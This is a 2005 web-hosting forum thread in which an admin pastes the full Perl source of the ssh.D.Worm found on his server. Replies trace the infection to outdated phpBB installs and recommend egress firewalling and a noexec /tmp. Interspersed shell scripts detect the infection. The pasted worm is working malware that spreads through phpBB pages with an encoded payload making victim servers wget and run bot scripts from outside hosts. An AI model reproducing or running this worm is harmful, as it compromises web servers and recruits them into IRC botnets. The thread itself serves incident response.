Server attack ssh.d.worm - any advice ?

Discussion in 'General Discussion' started by EMS, Jan 9, 2005.

  1. EMS
    I suddenly noticed lots of processes running with high CPU, so I checked, and they are accessing /tmp/.temp22

    There is a file in there called ssh2.htm which contains the following code...

    #/usr/bin/perl

    ################################################################################
    # ------------------------------------------------------------------------ #
    # Severino Honorato - /server irc.priv8crew.info #Priv8crew - ssh.D.Worm #
    # #
    ################################################################################


    use IO::Socket;
    use LWP::Simple;
    my $processo = "/usr/local/apache/bin/httpd - D5SL";
    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";

    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);

    while(1){
    @vul = "";
    $a=0;
    $numero = int rand(999);
    $procura = "viewtopic.php?t=$numero";

    ######################################
    for($n=1;$n<9000;$n += 105){

    @cade = get("http://search.msn.com.br/advresults.aspx?q=$procura&FORM=SMCRT&ps=ba=$n") or next;
    $ae = "@cade";
    #print $ae;
    while ($ae=~ m/<\/span><br\/><br\/><\/div><\/li><li><a href=\".*?\" class=\"t\">/){
    $ae=~ s/<\/span><br\/><br\/><\/div><\/li><li><a href=\"(.*?)\" class=\"t\">/$1/;
    $uber=$1;
    #print $uber;
    if ($uber =~/&/){
    $nu = index $uber, '&';
    $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    #print $uber."\n";
    $a++
    }
    #print 'Encontrados: '.$a.' Sites';
    }

    #########################


    $cmd = "&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;mkdir .temp22;cd .temp22;wget http://www.quasi-sane.com/pics/bot.htm;wget http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';";

    $b = scalar(@vul);

    for($a=0;$a<=$b;$a++)
    {
    $sitevul = $vul[$a] . $cmd;
    if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }

    $teste1 = get($sitevul) or next;
    $teste1 = "";
    }
    }


    Can anyone help me stop this? Whenever I delete the .temp22 folder it returns again minutes later. The processes build up until they eventually take up too many resources.
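    An added example (my own, not from this thread or from cPanel) for the symptom described above: the worm sets its process name to look like Apache while the real executable is perl and its working directory is a hidden folder under /tmp. The check below flags exactly that mismatch. The process table SAMPLE is constructed for the demo; collect_proc() gathers the same four fields from /proc on a live Linux box and can be piped into flag_masquerade.

```shell
# Added example, not from the thread. Input lines: pid|exe|cmdline|cwd
# (what /proc/PID/exe, /proc/PID/cmdline and /proc/PID/cwd give you).
flag_masquerade() {
  awk -F'|' '
    {
      pid = $1; exe = $2; cmd = $3; cwd = $4
      reason = ""
      # command line claims to be httpd, but the binary behind it is not httpd
      if (cmd ~ /^\/usr\/local\/apache\/bin\/httpd/ && exe !~ /\/httpd$/) {
        reason = reason "exe-mismatch(" exe ") "
      }
      # working directory is a dot-directory under /tmp (like /tmp/.temp22)
      if (cwd ~ /^\/tmp\/\./) {
        reason = reason "hidden-tmp-cwd(" cwd ") "
      }
      if (reason != "") print pid, reason
    }'
}

# Build the same table from /proc on a live system (Linux only; needs root
# to read every process). Kernel threads without an exe link are skipped.
collect_proc() {
  for d in /proc/[0-9]*; do
    pid=${d#/proc/}
    exe=$(readlink "$d/exe" 2>/dev/null) || continue
    cwd=$(readlink "$d/cwd" 2>/dev/null) || cwd=""
    cmd=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null)
    printf '%s|%s|%s|%s\n' "$pid" "$exe" "$cmd" "$cwd"
  done
}

# Constructed sample: one disguised perl process, one real httpd, one shell
# sitting in the hidden directory, one harmless editor session.
SAMPLE='1234|/usr/bin/perl|/usr/local/apache/bin/httpd -D5SL|/tmp/.temp22
1235|/usr/local/apache/bin/httpd|/usr/local/apache/bin/httpd -DSSL|/
1236|/bin/bash|bash|/tmp/.temp22
1237|/usr/bin/vim|vim notes.txt|/home/user'

printf '%s\n' "$SAMPLE" | flag_masquerade
# Live use: collect_proc | flag_masquerade
```

    Only 1234 and 1236 are reported; the genuine httpd worker (1235) passes because its exe link really ends in /httpd. Once you have the PIDs, /proc/PID/cwd and the parent chain tell you which account's web space the script was fetched into.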
     
  2. philb
    Whoa, sorry no. Wrong worm. That's possibly getting in through a duff phpBB install - do you have any installs of phpBB on your server? Don't you use phpsuexec?
     
    #2 philb, Jan 9, 2005
    Last edited: Jan 9, 2005
  3. EMS
    Using PHP with Apache - not Perl.

    I don't know what keeps creating the folder - that's what I want to stop - wget is now secured on this box so it can't grab the html file, but I'd like to understand what is doing this and how I can get rid of it.

    I've seen lots of discussion in many places about this perl script, but what I can't find is exactly which process is putting it there and how to stop it.
     
  4. philb
    Yes, but phpBB has a hole in it that lets people put anything they like on your server - C programs (and compile them), Perl, PHP, bash, whatever they like.

    It's getting in through a phpBB installation. If you had phpsuexec enabled on your server you'd immediately be able to see what user was running the bad version of phpBB.

    Instead you're going to have to search for every copy of viewtopic.php on your system that's part of a phpBB install (be aware phpNuke has a file called the same, and I believe old phpNuke installs may possibly be vulnerable too) and check if it's older than the 18th of November 2004. (phpNuke files have different dates in.)

    Any that are dated older than 18/11/2004 need to be deleted, or you need to suspend the user(s)' site(s) and tell them to update their phpBB install when you re-enable it.
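    An added example (my own, not from the thread) of the search philb describes: list every viewtopic.php under a web root whose modification time is not newer than a cutoff date. It uses a reference file touched to the cutoff so it stays POSIX (no GNU -newermt needed). The directory tree built by demo_tree() is constructed; the user names and paths in it are assumptions, not anything from the thread.

```shell
# Added example, not from the thread.
# find_stale_viewtopic ROOT CCYYMMDDhhmm  -> paths of viewtopic.php files whose
# mtime is not newer than the cutoff, one per line, sorted.
find_stale_viewtopic() {
  root=$1
  cutoff=$2
  ref=$(mktemp)
  touch -t "$cutoff" "$ref"          # reference file carrying the cutoff mtime
  find "$root" -type f -name viewtopic.php ! -newer "$ref" -print | sort
  rm -f "$ref"
}

# Constructed sample tree: one unpatched phpBB, one updated after the cutoff,
# and a phpNuke forum module that ships a file of the same name.
demo_tree() {
  base=$(mktemp -d)
  mkdir -p "$base/user1/public_html/forum" \
           "$base/user2/public_html/phpBB2" \
           "$base/user3/public_html/nuke/modules/Forums"
  touch -t 200407010000 "$base/user1/public_html/forum/viewtopic.php"         # pre-cutoff
  touch -t 200412050000 "$base/user2/public_html/phpBB2/viewtopic.php"        # updated
  touch -t 200403010000 "$base/user3/public_html/nuke/modules/Forums/viewtopic.php"  # phpNuke copy
  printf '%s\n' "$base"
}

base=$(demo_tree)
find_stale_viewtopic "$base" 200411180000   # on a cPanel box: /home 200411180000
rm -rf "$base"
```

    The phpNuke copy is listed too, which is the point philb makes: the hit list needs a manual look at each install rather than blind deletion. Mtime is also trivially reset by anyone who can write the file, so treat a "new" date as a hint, not proof that the install was updated.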
     
  5. InfoJunky
    Actually, it's able to get in via ANY php and standard apache... it's not the standard santy.c worm. From the securityfocus.com bugtraq archive (http://securityfocus.com/archive/1/385659/2004-12-23/2004-12-29/0)...
    I had an earlier version of this worm (ssh.a) and once we were able to lock it down, it finally left clues.

    The best thing to do is to first close all non-critical outbound ports and IPs in your firewall. We even temporarily disabled port 80 out to cage this bastard worm. This cuts the worm's outbound traffic, as it connects to a large darknet of IRC servers. It also prevents your box from getting unplugged from the network.

    In APF:

    EGF="1"
    # Common egress (outbound) TCP ports
    EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
    # Common egress (outbound) UDP ports
    EG_UDP_CPORTS="20,21,53,123,465,873"

    Next thing to do is to be sure your /tmp is properly noexec, not just the cpanel/whm version of clicking an option. The security admin that helped me track this out has a great how-to article for this at http://eth0.us/?q=node/11 .

    My server was the first time he came across this worm back on Christmas weekend. With help from the author of APF, and a few others, he and I worked out a decent mod_security for apache. You can read http://eth0.us/?q=node/17 for more help, or contact eth00 and tell him infojunky sent ya.
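    An added example (my own, not from the thread or from the eth0.us article) for the "/tmp is properly noexec" check above: parse /proc/mounts-style lines (device, mount point, fstype, options, dump, pass) and confirm /tmp is a separate mount carrying noexec and nosuid, rather than trusting a control-panel checkbox. The sample mount tables are constructed; the /usr/tmpDSK device name is an assumption about how a loopback /tmp typically appears. One caveat worth knowing: noexec on /tmp stops a file there from being run directly, but the worm above is started as "perl ssh2.htm", with the interpreter living outside /tmp, so this mount option is one layer and not a complete fix on its own.

```shell
# Added example, not from the thread.
# tmp_mount_opts [MOUNTS_FILE] [MOUNT_POINT] -> option list of that mount point
tmp_mount_opts() {
  awk -v mp="${2:-/tmp}" '$2 == mp { print $4 }' "${1:-/proc/mounts}"
}

# has_opt LIST OPT -> true if OPT is one of the comma-separated options in LIST
has_opt() {
  case ",$1," in *",$2,"*) return 0 ;; esac
  return 1
}

# check_tmp [MOUNTS_FILE] -> 0 if /tmp has noexec and nosuid,
#                            1 if mounted but missing an option,
#                            2 if /tmp is not its own mount at all
check_tmp() {
  opts=$(tmp_mount_opts "$1" /tmp)
  [ -n "$opts" ] || { echo "/tmp is not a separate mount"; return 2; }
  missing=""
  for o in noexec nosuid; do
    has_opt "$opts" "$o" || missing="$missing $o"
  done
  if [ -n "$missing" ]; then
    echo "/tmp lacks:$missing"
    return 1
  fi
  echo "/tmp ok ($opts)"
  return 0
}

# Constructed /proc/mounts excerpts for the demo; writes a temp file and
# prints its path.
sample_mounts() {
  f=$(mktemp)
  case $1 in
    good) printf '%s\n' '/dev/sda1 / ext3 rw 0 0' '/usr/tmpDSK /tmp ext3 rw,noexec,nosuid 0 0' > "$f" ;;
    bad)  printf '%s\n' '/dev/sda1 / ext3 rw 0 0' '/usr/tmpDSK /tmp ext3 rw 0 0' > "$f" ;;
    none) printf '%s\n' '/dev/sda1 / ext3 rw 0 0' > "$f" ;;
  esac
  printf '%s\n' "$f"
}

for s in good bad none; do
  f=$(sample_mounts "$s")
  if check_tmp "$f"; then :; else echo "  -> exit status $?"; fi
  rm -f "$f"
done
# Live use: check_tmp            (reads /proc/mounts)
```

    Running check_tmp with no argument reads the real /proc/mounts. If it reports 2, /tmp is just a directory on the root filesystem and no amount of option-ticking has changed that; remounting it (or a loopback image) with noexec,nosuid is what the eth0.us how-to covers.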
     
  6. philb
    If you read the source code for the worm, it's going off to search for

    $procura = "viewtopic.php?t=$numero";

    This is a 99.9% indicator that it is spreading via phpbb. (or the phpbb version inside phpnuke - either way).

    If your phpBB is up to date it should not be possible to be exploited with this, otherwise all the phpBB installs on all of my servers would have fallen prey to it. The PHP vulnerabilities, as far as I read it, were a different thing, and AFAICR you are still vulnerable if you're running old phpBB on new PHP.
     
  7. philb
    I should add that yes, running APF is a very good idea indeed. There's no reason not to be running a properly locked-down firewall, as it makes the worst parts of the payload of these worms (backdoor shells, IRC-controlled DDoS bots) completely useless: they will be unable to do anything on the network if ingress and egress filtering is correctly configured.
     
  8. EMS
    Yes, in this case everything was fine. I use a very strict firewall config and now have fully secured tmp.

    I recently have started securing our new boxes with services from rfxnetworks, and I think companies such as this are great for small businesses like us who don't have the time to become security experts.
     